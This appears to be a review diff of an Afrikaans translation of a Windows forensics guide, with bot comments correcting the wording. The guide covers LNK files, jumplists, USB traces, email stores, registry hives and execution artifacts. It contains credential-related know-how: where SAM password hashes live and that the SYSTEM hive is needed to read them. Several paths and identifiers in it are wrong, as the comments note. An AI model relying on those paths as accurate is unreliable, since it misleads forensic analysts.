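Review bot: "kantoor" translates the product name Office as a room; the heading two lines up keeps "Office AutoSaved-lêers", so the sentence should read "die Office outomaties gestoorde lêers". The path `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` is copied unchanged from the source, including the Spanish folder name `Usuarios` and the missing separator between `Microsoft` and the `{...}` alternatives; the translation pass is the place to normalise it to `C:\Users\<gebruikersnaam>\AppData\Roaming\Microsoft\{Excel|Word|Powerpoint}\`, matching the `<gebruikersnaam>` placeholder style used in the Windows Mail section below.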
|
||||
|
||||
## Shell Items
|
||||
|
||||
A shell item is an item that contains information about how to access another file.
|
||||
'n Skulpunt is 'n item wat inligting bevat oor hoe om toegang tot 'n ander lêer te verkry.
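Review bot: "Skulpunt" is an unclear coinage for "shell item", and the heading above this line keeps the English "Shell Items"; keep the term as-is in the sentence ("'n Shell item is 'n item wat ...") so the prose matches the heading and the tool output an analyst will see.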
|
||||
|
||||
### Recent Documents (LNK)
|
||||
### Onlangse Dokumente (LNK)
|
||||
|
||||
Windows **automatically** **creates** these **shortcuts** when the user **open, uses or creates a file** in:
|
||||
Windows skep **outomaties** hierdie **kortpaaie** wanneer die gebruiker 'n lêer **open, gebruik of skep** in:
|
||||
|
||||
* Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
|
||||
* Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
|
||||
|
||||
When a folder is created, a link to the folder, to the parent folder, and the grandparent folder is also created.
|
||||
Wanneer 'n vouer geskep word, word 'n skakel na die vouer, na die ouervouer en die ouergrootouervouer ook geskep.
|
||||
|
||||
These automatically created link files **contain information about the origin** like if it's a **file** **or** a **folder**, **MAC** **times** of that file, **volume information** of where is the file stored and **folder of the target file**. This information can be useful to recover those files in case they were removed.
|
||||
Hierdie outomaties geskepte skakel lêers **bevat inligting oor die oorsprong** soos of dit 'n **lêer** **of** 'n **vouer** is, **MAC** **tye** van daardie lêer, **volume-inligting** van waar die lêer gestoor word en die **vouer van die teikenvouer**. Hierdie inligting kan nuttig wees om daardie lêers te herstel in die geval dat hulle verwyder is.
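Review bot: "**vouer van die teikenvouer**" mistranslates "folder of the target file" (the LNK target is a file); it should be "**vouer van die teikenlêer**". Two lines up, "ouergrootouervouer" for "grandparent folder" is doubled up; "grootouervouer" is enough. Note also that both `Recent\` paths in this region (`C:\Users\\AppData\Roaming\...`) carry an empty username component from the source; consider inserting the `<gebruikersnaam>` placeholder while the lines are being touched.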
|
||||
|
||||
Also, the **date created of the link** file is the first **time** the original file was **first** **used** and the **date** **modified** of the link file is the **last** **time** the origin file was used.
|
||||
Verder is die **skepdatum van die skakel** lêer die eerste **keer** wat die oorspronklike lêer **eerste** **gebruik** is en die **gewysigde datum** van die skakel lêer is die **laaste** **keer** wat die oorspronklike lêer gebruik is.
|
||||
|
||||
To inspect these files you can use [**LinkParser**](http://4discovery.com/our-tools/).
|
||||
Om hierdie lêers te ondersoek, kan jy die instrument [**LinkParser**](http://4discovery.com/our-tools/) gebruik.
|
||||
|
||||
In this tools you will find **2 sets** of timestamps:
|
||||
In hierdie instrument sal jy **2 stelle** tydmerke vind:
|
||||
|
||||
* **First Set:**
|
||||
1. FileModifiedDate
|
||||
2. FileAccessDate
|
||||
3. FileCreationDate
|
||||
* **Second Set:**
|
||||
1. LinkModifiedDate
|
||||
2. LinkAccessDate
|
||||
3. LinkCreationDate.
|
||||
* **Eerste Stel:**
|
||||
1. FileModifiedDate
|
||||
2. FileAccessDate
|
||||
3. FileCreationDate
|
||||
* **Tweede Stel:**
|
||||
1. LinkModifiedDate
|
||||
2. LinkAccessDate
|
||||
3. LinkCreationDate.
|
||||
|
||||
The first set of timestamp references the **timestamps of the file itself**. The second set references the **timestamps of the linked file**.
|
||||
|
||||
You can get the same information running the Windows CLI tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
|
||||
Die eerste stel tydmerke verwys na die **tydmerke van die lêer self**. Die tweede stel verwys na die **tydmerke van die gekoppelde lêer**.
|
||||
|
||||
Jy kan dieselfde inligting kry deur die Windows CLI-instrument [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) uit te voer.
|
||||
```
|
||||
LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
||||
```
|
||||
In hierdie geval sal die inligting binne 'n CSV-lêer gestoor word.
|
||||
|
||||
In this case, the information is going to be saved inside a CSV file.
|
||||
### Springlyste
|
||||
|
||||
### Jumplists
|
||||
Dit is die onlangse lêers wat per toepassing aangedui word. Dit is die lys van onlangse lêers wat deur 'n toepassing gebruik word en waartoe jy toegang kan verkry op elke toepassing. Hulle kan outomaties geskep word of aangepas wees.
|
||||
|
||||
These are the recent files that are indicated per application. It's the list of **recent files used by an application** that you can access on each application. They can be created **automatically or be custom**.
|
||||
Die outomaties geskepte springlyste word gestoor in `C:\Users\{gebruikersnaam}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Die springlyste word genoem volgens die formaat `{id}.autmaticDestinations-ms` waar die aanvanklike ID die ID van die toepassing is.
|
||||
|
||||
The **jumplists** created automatically are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. The jumplists are named following the format `{id}.autmaticDestinations-ms` where the initial ID is the ID of the application.
|
||||
Die aangepaste springlyste word gestoor in `C:\Users\{gebruikersnaam}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` en hulle word gewoonlik deur die toepassing geskep omdat iets belangrik met die lêer gebeur het (dalk as gunsteling gemerk).
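Review bot: the file-name pattern `{id}.autmaticDestinations-ms` has a typo in both the removed and the added line (compare the folder `AutomaticDestinations\` on the same line); it should be `{id}.automaticDestinations-ms`. The sibling folder on the next line is written `CustomDestination\` in both versions, but the real folder name is plural, `CustomDestinations\`. The translated lines also drop the bold the source puts on "recent files used by an application", "automatically or be custom" and "important"; keep the emphasis so the Afrikaans page highlights the same terms. Finally, `{gebruikersnaam}` here versus `<gebruikersnaam>` in the Windows Mail section below: pick one placeholder style for the whole file.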
|
||||
|
||||
The custom jumplists are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` and they are created by the application usually because something **important** has happened with the file (maybe marked as favorite)
|
||||
Die **geskepte tyd** van enige springlys dui die **eerste keer aan dat die lêer geopen is** en die **veranderde tyd die laaste keer**.
|
||||
|
||||
The **created time** of any jumplist indicates the **the first time the file was accessed** and the **modified time the last time**.
|
||||
|
||||
You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
|
||||
Jy kan die springlyste ondersoek met behulp van [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
|
||||
|
||||
![](<../../../.gitbook/assets/image (474).png>)
|
||||
|
||||
(_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_)
|
||||
(_Let daarop dat die tye wat deur JumplistExplorer verskaf word, verband hou met die springlys-lêer self_)
|
||||
|
||||
### Shellbags
|
||||
|
||||
[**Follow this link to learn what are the shellbags.**](interesting-windows-registry-keys.md#shellbags)
|
||||
[**Volg hierdie skakel om uit te vind wat die shellbags is.**](interesting-windows-registry-keys.md#shellbags)
|
||||
|
||||
## Use of Windows USBs
|
||||
## Gebruik van Windows USB's
|
||||
|
||||
It's possible to identify that a USB device was used thanks to the creation of:
|
||||
Dit is moontlik om te identifiseer dat 'n USB-toestel gebruik is as gevolg van die skepping van:
|
||||
|
||||
* Windows Recent Folder
|
||||
* Microsoft Office Recent Folder
|
||||
* Jumplists
|
||||
* Windows Onlangse Gids
|
||||
* Microsoft Office Onlangse Gids
|
||||
* Springlyste
|
||||
|
||||
Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder:
|
||||
Let daarop dat sommige LNK-lêers in plaas van na die oorspronklike pad te verwys, na die WPDNSE-gids verwys:
|
||||
|
||||
![](<../../../.gitbook/assets/image (476).png>)
|
||||
|
||||
The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag.
|
||||
Die lêers in die WPDNSE-gids is 'n kopie van die oorspronklike lêers en sal dus nie oorleef na 'n herlaai van die rekenaar nie, en die GUID word geneem uit 'n shellbag.
|
||||
|
||||
### Registry Information
|
||||
### Registerinligting
|
||||
|
||||
[Check this page to learn](interesting-windows-registry-keys.md#usb-information) which registry keys contain interesting information about USB connected devices.
|
||||
[Kyk na hierdie bladsy om uit te vind](interesting-windows-registry-keys.md#usb-information) watter registerkodes interessante inligting oor USB-aangeslote toestelle bevat.
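Review bot: "registerkodes" is not the term for registry keys; the rest of the translated file uses "sleutel" (see the "Herstel van Verwyderde Element" section), so this should be "watter registersleutels interessante inligting ... bevat".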
|
||||
|
||||
### setupapi
|
||||
|
||||
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
|
||||
Kyk na die lêer `C:\Windows\inf\setupapi.dev.log` om die tye te kry wanneer die USB-aansluiting plaasgevind het (soek na `Section start`).
|
||||
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
|
||||
|
||||
### USB Detective
|
||||
|
||||
[**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image.
|
||||
[**USBDetective**](https://usbdetective.com) kan gebruik word om inligting te verkry oor die USB-toestelle wat aan 'n beeld gekoppel was.
|
||||
|
||||
![](<../../../.gitbook/assets/image (483).png>)
|
||||
|
||||
### Plug and Play Cleanup
|
||||
### Inprop en Speel Skoonmaak
|
||||
|
||||
The scheduled task known as 'Plug and Play Cleanup' is primarily designed for the removal of outdated driver versions. Contrary to its specified purpose of retaining the latest driver package version, online sources suggest it also targets drivers that have been inactive for 30 days. Consequently, drivers for removable devices not connected in the past 30 days may be subject to deletion.
|
||||
Die geskeduleerde taak wat bekend staan as 'Inprop en Speel Skoonmaak' is primêr ontwerp vir die verwydering van verouderde bestuurdersweergawes. In teenstelling met sy gespesifiseerde doelwit om die nuutste bestuurderspakketweergawe te behou, dui aanlynbronne daarop dat dit ook mik op bestuurders wat vir 30 dae onaktief was. Gevolglik kan bestuurders vir verwyderbare toestelle wat nie in die afgelope 30 dae aangesluit is nie, onderhewig wees aan uitwissing.
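Review bot: 'Plug and Play Cleanup' is the literal name of the scheduled task, and the path a few lines down keeps it untranslated (`...\Plug and Play\Plug and Play Cleanup`); translating it to 'Inprop en Speel Skoonmaak' in the heading and the prose makes the text unsearchable against what an analyst sees in Task Scheduler. Keep the task name as-is and, if a gloss is wanted, put the Afrikaans in parentheses once. "bestuurders" for "drivers" also reads as people driving; "drywers" (device drivers) avoids the ambiguity.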
|
||||
|
||||
The task is located at the following path:
|
||||
Die taak is geleë by die volgende pad:
|
||||
`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`.
|
||||
|
||||
A screenshot depicting the task's content is provided:
|
||||
'n Skermkiekie wat die inhoud van die taak uitbeeld, word voorsien:
|
||||
![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
|
||||
|
||||
**Key Components and Settings of the Task:**
|
||||
- **pnpclean.dll**: This DLL is responsible for the actual cleanup process.
|
||||
- **UseUnifiedSchedulingEngine**: Set to `TRUE`, indicating the use of the generic task scheduling engine.
|
||||
**Kernkomponente en instellings van die taak:**
|
||||
- **pnpclean.dll**: Hierdie DLL is verantwoordelik vir die werklike skoonmaakproses.
|
||||
- **UseUnifiedSchedulingEngine**: Gestel op `TRUE`, wat dui op die gebruik van die generiese taakbeplanning-enjin.
|
||||
- **MaintenanceSettings**:
|
||||
- **Period ('P1M')**: Directs the Task Scheduler to initiate the cleanup task monthly during regular Automatic maintenance.
|
||||
- **Deadline ('P2M')**: Instructs the Task Scheduler, if the task fails for two consecutive months, to execute the task during emergency Automatic maintenance.
|
||||
- **Period ('P1M')**: Stuur die Taakbeplanner om die skoonmaaktaak maandeliks tydens gereelde outomatiese instandhouding te begin.
|
||||
- **Deadline ('P2M')**: Instrueer die Taakbeplanner, as die taak vir twee opeenvolgende maande misluk, om die taak tydens noodgevalle outomatiese instandhouding uit te voer.
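Review bot: "Stuur die Taakbeplanner om ..." translates "Directs" as "sends"; the meaning is an instruction, so "Gee die Taakbeplanner opdrag om die skoonmaaktaak maandeliks ... te begin", parallel to "Instrueer" in the Deadline bullet. "tydens noodgevalle outomatiese instandhouding" should be "tydens outomatiese noodinstandhouding" (emergency Automatic maintenance is one concept).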
|
||||
|
||||
This configuration ensures regular maintenance and cleanup of drivers, with provisions for reattempting the task in case of consecutive failures.
|
||||
Hierdie konfigurasie verseker gereelde instandhouding en skoonmaak van bestuurders, met voorsiening vir herpoging van die taak in geval van opeenvolgende mislukkings.
|
||||
|
||||
**For more information check:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
|
||||
**Vir meer inligting, kyk na:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
|
||||
|
||||
## Emails
|
||||
## E-posse
|
||||
|
||||
Emails contain **2 interesting parts: The headers and the content** of the email. In the **headers** you can find information like:
|
||||
E-posse bevat **2 interessante dele: Die koppe en die inhoud** van die e-pos. In die **koppe** kan jy inligting soos vind:
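Review bot: the word order in "kan jy inligting soos vind:" is broken; it should be "kan jy inligting vind soos:" so the colon introduces the bullet list that follows.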
|
||||
|
||||
* **Who** sent the emails (email address, IP, mail servers that have redirected the email)
|
||||
* **When** was the email sent
|
||||
* **Wie** het die e-posse gestuur (e-posadres, IP, posbedieners wat die e-pos omgelei het)
|
||||
* **Wanneer** is die e-posse gestuur
|
||||
|
||||
Also, inside the `References` and `In-Reply-To` headers you can find the ID of the messages:
|
||||
Binne die `References` en `In-Reply-To` koppe kan jy ook die ID van die boodskappe vind:
|
||||
|
||||
![](<../../../.gitbook/assets/image (484).png>)
|
||||
|
||||
### Windows Mail App
|
||||
### Windows-pos-app
|
||||
|
||||
This application saves emails in HTML or text. You can find the emails inside subfolders inside `\Users\<username>\AppData\Local\Comms\Unistore\data\3\`. The emails are saved with the `.dat` extension.
|
||||
Hierdie toepassing stoor e-posse in HTML- of teksformaat. Jy kan die e-posse binne subgidsies binne `\Users\<gebruikersnaam>\AppData\Local\Comms\Unistore\data\3\` vind. Die e-posse word met die `.dat`-uitbreiding gestoor.
|
||||
|
||||
The **metadata** of the emails and the **contacts** can be found inside the **EDB database**: `\Users\<username>\AppData\Local\Comms\UnistoreDB\store.vol`
|
||||
Die **metadata** van die e-posse en die **kontakte** kan binne die **EDB-databasis** gevind word: `\Users\<gebruikersnaam>\AppData\Local\Comms\UnistoreDB\store.vol`
|
||||
|
||||
**Change the extension** of the file from `.vol` to `.edb` and you can use the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) to open it. Inside the `Message` table you can see the emails.
|
||||
**Verander die uitbreiding** van die lêer van `.vol` na `.edb` en jy kan die instrument [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) gebruik om dit oop te maak. Binne die `Message`-tabel kan jy die e-posse sien.
|
||||
|
||||
### Microsoft Outlook
|
||||
|
||||
When Exchange servers or Outlook clients are used there are going to be some MAPI headers:
|
||||
Wanneer Exchange-bedieners of Outlook-kliënte gebruik word, sal daar sekere MAPI-koppe wees:
|
||||
|
||||
* `Mapi-Client-Submit-Time`: Time of the system when the email was sent
|
||||
* `Mapi-Conversation-Index`: Number of children messages of the thread and timestamp of each message of the thread
|
||||
* `Mapi-Entry-ID`: Message identifier.
|
||||
* `Mappi-Message-Flags` and `Pr_last_Verb-Executed`: Information about the MAPI client (message read? no read? responded? redirected? out of the office?)
|
||||
* `Mapi-Client-Submit-Time`: Tyd van die stelsel toe die e-pos gestuur is
|
||||
* `Mapi-Conversation-Index`: Aantal kinderboodskappe van die draad en tydstempel van elke boodskap van die draad
|
||||
* `Mapi-Entry-ID`: Boodskapidentifiseerder.
|
||||
* `Mappi-Message-Flags` en `Pr_last_Verb-Executed`: Inligting oor die MAPI-kliënt (boodskap gelees? nie gelees nie? geantwoord? omgelei? uit die kantoor?)
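Review bot: `Mappi-Message-Flags` has a doubled "p" in both the removed and the added line, inconsistent with the three `Mapi-` headers above it in the same list; it should be `Mapi-Message-Flags`. `Pr_last_Verb-Executed` likewise mixes case and separators; the MAPI property is `PR_LAST_VERB_EXECUTED`. Since the list is being rewritten, fix the identifiers rather than carrying the typos into the translation.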
|
||||
|
||||
In the Microsoft Outlook client, all the sent/received messages, contacts data, and calendar data are stored in a PST file in:
|
||||
In die Microsoft Outlook-kliënt word al die gestuur/ontvang boodskappe, kontakte-inligting en kalenderinligting gestoor in 'n PST-lêer in:
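Review bot: "al die gestuur/ontvang boodskappe" needs the participle forms: "al die gestuurde/ontvangde boodskappe".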
|
||||
|
||||
* `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook` (WinXP)
|
||||
* `%USERPROFILE%\AppData\Local\Microsoft\Outlook`
|
||||
|
||||
The registry path `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` indicates the file that is being used.
|
||||
Die registerpad `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` dui die lêer aan wat gebruik word.
|
||||
|
||||
You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html).
|
||||
Jy kan die PST-lêer oopmaak met die instrument [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html).
|
||||
|
||||
![](<../../../.gitbook/assets/image (485).png>)
|
||||
### Microsoft Outlook OST-lêers
|
||||
|
||||
### Microsoft Outlook OST Files
|
||||
'n **OST-lêer** word gegenereer deur Microsoft Outlook wanneer dit gekonfigureer is met 'n **IMAP** of 'n **Exchange**-bediener, wat soortgelyke inligting as 'n PST-lêer stoor. Hierdie lêer word gesinkroniseer met die bediener en behou data vir **die laaste 12 maande** tot 'n **maksimum grootte van 50GB**, en dit is geleë in dieselfde gids as die PST-lêer. Om 'n OST-lêer te sien, kan die [**Kernel OST-kieker**](https://www.nucleustechnologies.com/ost-viewer.html) gebruik word.
|
||||
|
||||
An **OST file** is generated by Microsoft Outlook when it's configured with **IMAP** or an **Exchange** server, storing similar information to a PST file. This file is synchronized with the server, retaining data for **the last 12 months** up to a **maximum size of 50GB**, and is located in the same directory as the PST file. To view an OST file, the [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) can be utilized.
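Review bot: "Kernel OST-kieker" translates a product name; the PST paragraph above keeps "Kernel PST Viewer" untranslated, and the link target is the vendor's product page, so keep "Kernel OST Viewer" here as well.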
|
||||
### Terugwinning van Aanhegsels
|
||||
|
||||
### Retrieving Attachments
|
||||
Verlore aanhegsels kan herwin word vanaf:
|
||||
|
||||
Lost attachments might be recoverable from:
|
||||
- Vir **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
|
||||
- Vir **IE11 en hoër**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
|
||||
|
||||
- For **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
|
||||
- For **IE11 and above**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
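Review bot: both attachment paths, in the removed and the added lines, start with `%APPDATA%\Local\...`; `%APPDATA%` expands to the Roaming profile folder, so that path does not exist. The Local paths are `%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Outlook` (IE10) and `%LOCALAPPDATA%\Microsoft\InetCache\Content.Outlook` (IE11 and later), consistent with the `\AppData\Local\...` form used in the Windows Mail section above. The translation pass should not carry the wrong variable across.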
|
||||
### Thunderbird MBOX-lêers
|
||||
|
||||
### Thunderbird MBOX Files
|
||||
**Thunderbird** maak gebruik van **MBOX-lêers** om data te stoor, geleë by `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`.
|
||||
|
||||
**Thunderbird** utilizes **MBOX files** to store data, located at `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`.
|
||||
### Beeld Duimnaels
|
||||
|
||||
### Image Thumbnails
|
||||
- **Windows XP en 8-8.1**: Toegang tot 'n gids met duimnaels skep 'n `thumbs.db`-lêer wat beeldvoorbeelde stoor, selfs na uitvee.
|
||||
- **Windows 7/10**: `thumbs.db` word geskep wanneer dit oor 'n netwerk via 'n UNC-paad benader word.
|
||||
- **Windows Vista en nuwer**: Duimnaelvoorbeelde word gekentraliseer in `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` met lêers genaamd **thumbcache\_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) en [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) is hulpmiddels vir die sien van hierdie lêers.
|
||||
|
||||
- **Windows XP and 8-8.1**: Accessing a folder with thumbnails generates a `thumbs.db` file storing image previews, even after deletion.
|
||||
- **Windows 7/10**: `thumbs.db` is created when accessed over a network via UNC path.
|
||||
- **Windows Vista and newer**: Thumbnail previews are centralized in `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` with files named **thumbcache\_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) and [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) are tools for viewing these files.
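Review bot: "via 'n UNC-paad" in the Windows 7/10 bullet is a typo for "UNC-pad". The translated bullets otherwise track the source; consider keeping the bold on "thumbcache\_xxx.db" as the source does, which they do.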
|
||||
### Windows Registerinligting
|
||||
|
||||
### Windows Registry Information
|
||||
Die Windows-register, wat omvattende stelsel- en gebruikersaktiwiteitsdata stoor, word bevat binne lêers in:
|
||||
|
||||
The Windows Registry, storing extensive system and user activity data, is contained within files in:
|
||||
- `%windir%\System32\Config` vir verskeie `HKEY_LOCAL_MACHINE` subleutels.
|
||||
- `%UserProfile%{User}\NTUSER.DAT` vir `HKEY_CURRENT_USER`.
|
||||
- Windows Vista en nuwer weergawe maak rugsteun van `HKEY_LOCAL_MACHINE` registerlêers in `%Windir%\System32\Config\RegBack\`.
|
||||
- Daarbenewens word programuitvoeringsinligting gestoor in `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` vanaf Windows Vista en Windows 2008 Server voortgaan.
|
||||
|
||||
- `%windir%\System32\Config` for various `HKEY_LOCAL_MACHINE` subkeys.
|
||||
- `%UserProfile%{User}\NTUSER.DAT` for `HKEY_CURRENT_USER`.
|
||||
- Windows Vista and later versions back up `HKEY_LOCAL_MACHINE` registry files in `%Windir%\System32\Config\RegBack\`.
|
||||
- Additionally, program execution information is stored in `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` from Windows Vista and Windows 2008 Server onwards.
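Review bot: `%UserProfile%{User}\NTUSER.DAT` lacks a separator after `%UserProfile%` in both the removed and the added line; write `%UserProfile%\{User}\NTUSER.DAT` like the `USERCLASS.DAT` path two bullets down. In the added lines, "Windows Vista en nuwer weergawe" needs the plural "weergawes", and "vanaf Windows Vista en Windows 2008 Server voortgaan" is not grammatical for "onwards": "vanaf Windows Vista en Windows Server 2008 en later".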
|
||||
### Hulpmiddels
|
||||
|
||||
### Tools
|
||||
Sommige hulpmiddels is nuttig vir die analise van die registerlêers:
|
||||
|
||||
Some tools are useful to analyze the registry files:
|
||||
* **Registerredakteur**: Dit is geïnstalleer in Windows. Dit is 'n GUI om deur die Windows-register van die huidige sessie te blaai.
|
||||
* [**Registerverkenner**](https://ericzimmerman.github.io/#!index.md): Dit stel jou in staat om die registerlêer te laai en daardeur te blaai met 'n GUI. Dit bevat ook Bladmerke wat sleutels met interessante inligting uitlig.
|
||||
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Weereens, dit het 'n GUI wat toelaat om deur die gelaai register te blaai en bevat ook plugins wat interessante inligting binne die gelaai register uitlig.
|
||||
* [**Windows Registerherwinning**](https://www.mitec.cz/wrr.html): 'n Ander GUI-toepassing wat in staat is om die belangrike inligting uit die gelaai register te onttrek.
|
||||
|
||||
* **Registry Editor**: It's installed in Windows. It's a GUI to navigate through the Windows registry of the current session.
|
||||
* [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): It allows you to load the registry file and navigate through them with a GUI. It also contains Bookmarks highlighting keys with interesting information.
|
||||
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Again, it has a GUI that allows to navigate through the loaded registry and also contains plugins that highlight interesting information inside the loaded registry.
|
||||
* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Another GUI application capable of extracting the important information from the registry loaded.
|
||||
### Herstel van Verwyderde Element
|
||||
|
||||
### Recovering Deleted Element
|
||||
Wanneer 'n sleutel verwyder word, word dit as sodanig gemerk, maar dit sal nie verwyder word totdat die spasie wat dit beset word benodig nie. Daarom is dit moontlik om hierdie verwyderde sleutels te herstel deur gebruik te maak van hulpmiddels soos **Registerverkenner**.
|
||||
|
||||
When a key is deleted it's marked as such, but until the space it's occupying is needed it won't be removed. Therefore, using tools like **Registry Explorer** it's possible to recover these deleted keys.
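Review bot: "Registerverkenner" (here and in the Hulpmiddels list) and "Windows Registerherwinning" translate the product names Registry Explorer and Windows Registry Recovery, while the links point at those products; keep the tool names as they appear on their pages so readers can find them. In the added "Wanneer 'n sleutel verwyder word" sentence, "totdat die spasie wat dit beset word benodig nie" has the verbs in the wrong order: "totdat die spasie wat dit beset, benodig word nie". "Bladmerke" in the Registry Explorer bullet is better as "boekmerke".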
|
||||
### Laaste Skryftyd
|
||||
|
||||
### Last Write Time
|
||||
|
||||
Each Key-Value contains a **timestamp** indicating the last time it was modified.
|
||||
Elke Sleutel-Waarde bevat 'n **tydstempel** wat aandui wanneer dit laas gewysig is.
|
||||
|
||||
### SAM
|
||||
|
||||
The file/hive **SAM** contains the **users, groups and users passwords** hashes of the system.
|
||||
Die lêer/hive **SAM** bevat die **gebruikers, groepe en gebruikerswagwoorde**-hasings van die stelsel.
|
||||
|
||||
In `SAM\Domains\Account\Users` you can obtain the username, the RID, last login, last failed logon, login counter, password policy and when the account was created. To get the **hashes** you also **need** the file/hive **SYSTEM**.
|
||||
In `SAM\Domains\Account\Users` kan jy die gebruikersnaam, die RID, laaste aanmelding, laaste mislukte aanmelding, aanmeldingteller, wagwoordbeleid en wanneer die rekening geskep is, verkry. Om die **hasings** te kry, het jy ook die lêer/hive **SYSTEM** **nodig**.
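Review bot: "hasings" (in this line and in the SAM sentence above it) is not an Afrikaans word; keep "hashes", as the source does, or use "hash-waardes", consistently in both places.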
|
||||
|
||||
### Interesting entries in the Windows Registry
|
||||
### Interessante inskrywings in die Windows-register
|
||||
|
||||
{% content-ref url="interesting-windows-registry-keys.md" %}
|
||||
[interesting-windows-registry-keys.md](interesting-windows-registry-keys.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Programs Executed
|
||||
## Uitgevoerde Programme
|
||||
|
||||
### Basic Windows Processes
|
||||
### Basiese Windows-prosesse
|
||||
|
||||
In [this post](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) you can learn about the common Windows processes to detect suspicious behaviours.
|
||||
In [hierdie berig](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) kan jy leer oor die algemene Windows-prosesse om verdagte gedrag te identifiseer.
|
||||
|
||||
### Windows Recent APPs
|
||||
### Windows Onlangse Programme
|
||||
|
||||
Inside the registry `NTUSER.DAT` in the path `Software\Microsoft\Current Version\Search\RecentApps` you can subkeys with information about the **application executed**, **last time** it was executed, and **number of times** it was launched.
|
||||
Binne die register `NTUSER.DAT` in die pad `Software\Microsoft\Current Version\Search\RecentApps` kan jy subleutels kry met inligting oor die **uitgevoerde toepassing**, **laaste keer** wat dit uitgevoer is, en **aantal kere** wat dit geloods is.
|
||||
|
||||
### BAM (Background Activity Moderator)
|
||||
|
||||
You can open the `SYSTEM` file with a registry editor and inside the path `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` you can find the information about the **applications executed by each user** (note the `{SID}` in the path) and at **what time** they were executed (the time is inside the Data value of the registry).
|
||||
Jy kan die `SYSTEM`-lêer oopmaak met 'n registerredakteur en binne die pad `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` kan jy die inligting oor die **toepassings wat deur elke gebruiker uitgevoer is** vind (merk die `{SID}` in die pad) en **watter tyd** hulle uitgevoer is (die tyd is binne die Data-waarde van die register).
|
||||
|
||||
### Windows Prefetch
|
||||
|
||||
Prefetching is a technique that allows a computer to silently **fetch the necessary resources needed to display content** that a user **might access in the near future** so resources can be accessed quicker.
|
||||
Prefetching is 'n tegniek wat 'n rekenaar in staat stel om stilweg die nodige hulpbronne op te haal wat nodig is om inhoud te vertoon wat 'n gebruiker **moontlik binnekort sal toegang** sodat hulpbronne vinniger toeganklik kan wees.
